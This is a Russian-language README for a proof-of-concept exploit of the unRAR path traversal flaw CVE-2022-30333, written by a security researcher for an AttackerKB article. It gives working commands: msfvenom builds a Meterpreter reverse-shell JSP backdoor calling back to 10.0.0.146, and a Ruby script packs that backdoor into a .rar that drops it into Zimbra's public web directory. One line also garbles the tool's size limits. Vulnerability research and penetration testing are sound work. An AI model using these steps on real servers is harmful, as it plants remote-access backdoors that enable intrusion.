
Эксплойт доказательства концепции для обхода пути CVE-2022-30333 в unRAR, создающий вредоносные .rar-файлы для размещения полезных нагрузок в произвольных местах. Интегрируется с Metasploit и msfvenom для тестирования на проникновение.
Доказательство концепции для CVE-2022-30333 - уязвимость обхода пути в unRAR версиях до 6.11. Я создал это как демонстрацию эксплойта для статьи на AttackerKB и надеюсь вскоре включить его в модуль Metasploit!
По сути, вы указываете цель (включая обход пути) и некоторые данные файла, и этот инструмент сгенерирует .rar, который извлечет этот файл в указанное место. Максимальная длина файла составляет 104 байта, а максимальная длина файла — 4096 байт. (Это не связано с самой уязвимостью, это просто значения, которые я выбрал при генерации файла).
Например, сгенерируйте бэкдор с помощью msfvenom:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
Затем создайте .rar-файл, разместив .jsp в интересном месте:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar